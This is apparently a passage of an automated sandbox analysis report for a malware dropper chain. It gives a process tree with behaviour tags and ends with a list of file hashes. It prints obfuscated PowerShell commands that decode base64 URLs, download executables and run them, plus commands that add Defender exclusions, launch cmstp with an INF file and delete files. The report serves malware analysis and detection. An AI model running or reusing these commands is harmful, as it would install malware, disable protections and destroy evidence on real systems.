$mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3952 -
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
PID:968 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Users\Public\xsn.exe"C:\Users\Public\xsn.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4980 -
C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4404 -
C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5016 -
C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4408 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4408 & erase C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe & RD /S /Q C:\\ProgramData\\703026737453063\\* & exit8⤵PID:4724
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 44089⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4660 -
C:\Users\Public\xsn.exe"C:\Users\Public\xsn.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4224 -
C:\Users\Admin\AppData\Local\Temp\RfuDZIiMnF.exe"C:\Users\Admin\AppData\Local\Temp\RfuDZIiMnF.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\RfuDZIiMnF.exe"'8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\ruY2MTTTCi.exe"C:\Users\Admin\AppData\Local\Temp\ruY2MTTTCi.exe"7⤵
- Executes dropped EXE
PID:1392 -
C:\Users\Admin\AppData\Local\Temp\X8MTcYe6Ra.exe"C:\Users\Admin\AppData\Local\Temp\X8MTcYe6Ra.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4200 -
C:\Users\Admin\AppData\Local\Temp\X8MTcYe6Ra.exe"C:\Users\Admin\AppData\Local\Temp\X8MTcYe6Ra.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1320 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\woblbiuz.inf9⤵PID:5108
-
C:\Users\Admin\AppData\Local\Temp\03L24JM1FJ.exe"C:\Users\Admin\AppData\Local\Temp\03L24JM1FJ.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3116 -
C:\Users\Admin\AppData\Local\Temp\03L24JM1FJ.exe"C:\Users\Admin\AppData\Local\Temp\03L24JM1FJ.exe"8⤵
- Executes dropped EXE
- Windows security modification
PID:4960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵PID:4388
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xsn.exe"7⤵PID:3824
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:1240 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵PID:4308
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
MD5
02cc7b8ee30056d5912de54f1bdfc219
SHA1a6923da95705fb81e368ae48f93d28522ef552fb
SHA2561989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA5120d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5